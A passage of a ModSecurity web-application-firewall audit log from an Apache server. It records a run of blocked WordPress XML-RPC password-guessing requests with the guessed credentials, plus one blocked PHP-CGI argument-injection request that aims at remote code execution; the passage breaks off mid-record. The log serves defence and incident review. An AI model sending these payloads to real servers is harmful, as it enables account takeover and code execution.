system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin12345678 --8ec0cf2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ec0cf2d-E-- --8ec0cf2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.55.71 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100666294614 5251 (- - -) Stopwatch2: 1749100666294614 5251; combined=3885, p1=447, p2=3269, p3=0, p4=0, p5=99, sr=89, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ec0cf2d-Z-- --c750a25a-A-- [05/Jun/2025:12:17:49 +0700] aEEofeth7G2xELALzPYhKAAAAMI 103.236.140.4 35614 103.236.140.4 8181 --c750a25a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c750a25a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin12345678 --c750a25a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c750a25a-E-- --c750a25a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100669423610 4477 (- - -) Stopwatch2: 1749100669423610 4477; combined=3538, p1=366, p2=3006, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c750a25a-Z-- --3d197619-A-- [05/Jun/2025:12:18:11 +0700] aEEok-th7G2xELALzPYhLAAAAMk 103.236.140.4 35632 103.236.140.4 8181 --3d197619-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3d197619-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin!12345 --3d197619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d197619-E-- --3d197619-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100691510888 5874 (- - -) Stopwatch2: 1749100691510888 5874; combined=4135, p1=507, p2=3449, p3=0, p4=0, p5=108, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d197619-Z-- --e819333a-A-- [05/Jun/2025:12:18:24 +0700] aEEooFwdJdhOudw5hdzPBgAAAJA 103.236.140.4 35642 103.236.140.4 8181 --e819333a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e819333a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123+ --e819333a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e819333a-E-- --e819333a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100704865212 4836 (- - -) Stopwatch2: 1749100704865212 4836; combined=3657, p1=404, p2=3087, p3=0, p4=0, p5=96, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e819333a-Z-- --b81c9c3d-A-- [05/Jun/2025:12:18:51 +0700] aEEou-th7G2xELALzPYhNQAAANI 103.236.140.4 35654 103.236.140.4 8181 --b81c9c3d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b81c9c3d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@2015 --b81c9c3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b81c9c3d-E-- --b81c9c3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100731568690 5733 (- - -) Stopwatch2: 1749100731568690 5733; combined=4048, p1=543, p2=3332, p3=0, p4=0, p5=102, sr=101, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b81c9c3d-Z-- --74439873-A-- [05/Jun/2025:12:19:01 +0700] aEEoxeth7G2xELALzPYhNwAAANM 103.236.140.4 35658 103.236.140.4 8181 --74439873-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --74439873-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin#321 --74439873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74439873-E-- --74439873-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100741438751 5667 (- - -) Stopwatch2: 1749100741438751 5667; combined=4020, p1=527, p2=3320, p3=0, p4=0, p5=102, sr=98, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74439873-Z-- --c394777b-A-- [05/Jun/2025:12:19:19 +0700] aEEo1-th7G2xELALzPYhPAAAAMA 103.236.140.4 35676 103.236.140.4 8181 --c394777b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c394777b-C-- system.multicallmethodNamewp.getUsersBlogsparamstest12345678 --c394777b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c394777b-E-- --c394777b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100759712285 4799 (- - -) Stopwatch2: 1749100759712285 4799; combined=3682, p1=380, p2=3115, p3=0, p4=0, p5=107, sr=71, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c394777b-Z-- --af2b8031-A-- [05/Jun/2025:12:20:12 +0700] aEEpDOth7G2xELALzPYhSQAAANE 103.236.140.4 35706 103.236.140.4 8181 --af2b8031-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --af2b8031-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh102030 --af2b8031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af2b8031-E-- --af2b8031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100812209738 5121 (- - -) Stopwatch2: 1749100812209738 5121; combined=3877, p1=415, p2=3265, p3=0, p4=0, p5=113, sr=83, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af2b8031-Z-- --35271a52-A-- [05/Jun/2025:12:20:22 +0700] aEEpFuth7G2xELALzPYhTwAAAME 103.236.140.4 35724 103.236.140.4 8181 --35271a52-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --35271a52-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin111 --35271a52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35271a52-E-- --35271a52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100822169317 5620 (- - -) Stopwatch2: 1749100822169317 5620; combined=4488, p1=503, p2=3752, p3=0, p4=0, p5=137, sr=93, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35271a52-Z-- --e4a46c30-A-- [05/Jun/2025:12:21:31 +0700] aEEpW3-K7ToMdu-YSIIkYQAAABY 103.236.140.4 35778 103.236.140.4 8181 --e4a46c30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e4a46c30-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh++ --e4a46c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4a46c30-E-- --e4a46c30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100891347466 5283 (- - -) Stopwatch2: 1749100891347466 5283; combined=3830, p1=437, p2=3212, p3=0, p4=0, p5=107, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4a46c30-Z-- --52171d7b-A-- [05/Jun/2025:12:22:11 +0700] aEEpg-th7G2xELALzPYhawAAAMA 103.236.140.4 35798 103.236.140.4 8181 --52171d7b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --52171d7b-C-- --52171d7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52171d7b-E-- --52171d7b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100931678997 2910 (- - -) Stopwatch2: 1749100931678997 2910; combined=1831, p1=410, p2=1383, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52171d7b-Z-- --8b497f69-A-- [05/Jun/2025:12:22:15 +0700] aEEph-th7G2xELALzPYhbQAAAMY 103.236.140.4 35804 103.236.140.4 8181 --8b497f69-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8b497f69-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin777 --8b497f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b497f69-E-- --8b497f69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100935252950 4570 (- - -) Stopwatch2: 1749100935252950 4570; combined=3587, p1=390, p2=3028, p3=0, p4=0, p5=98, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b497f69-Z-- --1f13b46a-A-- [05/Jun/2025:12:24:20 +0700] aEEqBOth7G2xELALzPYhfwAAAMM 103.236.140.4 35864 103.236.140.4 8181 --1f13b46a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1f13b46a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@pass --1f13b46a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f13b46a-E-- --1f13b46a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101060297934 4523 (- - -) Stopwatch2: 1749101060297934 4523; combined=3507, p1=426, p2=2914, p3=0, p4=0, p5=97, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f13b46a-Z-- --0f5d6a0d-A-- [05/Jun/2025:12:24:44 +0700] aEEqHOth7G2xELALzPYhggAAAMY 103.236.140.4 35872 103.236.140.4 8181 --0f5d6a0d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.164.181.55 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.164.181.55 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0f5d6a0d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix2023 --0f5d6a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f5d6a0d-E-- --0f5d6a0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.164.181.55 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101084800085 4874 (- - -) Stopwatch2: 1749101084800085 4874; combined=3603, p1=434, p2=3014, p3=0, p4=0, p5=92, sr=80, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5d6a0d-Z-- --ad7a7846-A-- [05/Jun/2025:12:25:37 +0700] aEEqUeth7G2xELALzPYhiAAAAMw 103.236.140.4 35894 103.236.140.4 8181 --ad7a7846-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 493 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ad7a7846-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminrootr007pd8skdgSejrd --ad7a7846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad7a7846-E-- --ad7a7846-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101137618072 5562 (- - -) Stopwatch2: 1749101137618072 5562; combined=4023, p1=508, p2=3345, p3=0, p4=0, p5=100, sr=91, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad7a7846-Z-- --5d252278-A-- [05/Jun/2025:12:25:50 +0700] aEEqXuth7G2xELALzPYhiQAAAM0 103.236.140.4 35898 103.236.140.4 8181 --5d252278-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 493 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5d252278-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminrootr007pd8skdgSejrd --5d252278-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d252278-E-- --5d252278-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101150522124 5827 (- - -) Stopwatch2: 1749101150522124 5827; combined=4206, p1=509, p2=3580, p3=0, p4=0, p5=69, sr=93, sw=48, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d252278-Z-- --787d491b-A-- [05/Jun/2025:12:26:22 +0700] aEEqfuth7G2xELALzPYhjgAAANE 103.236.140.4 35912 103.236.140.4 8181 --787d491b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: 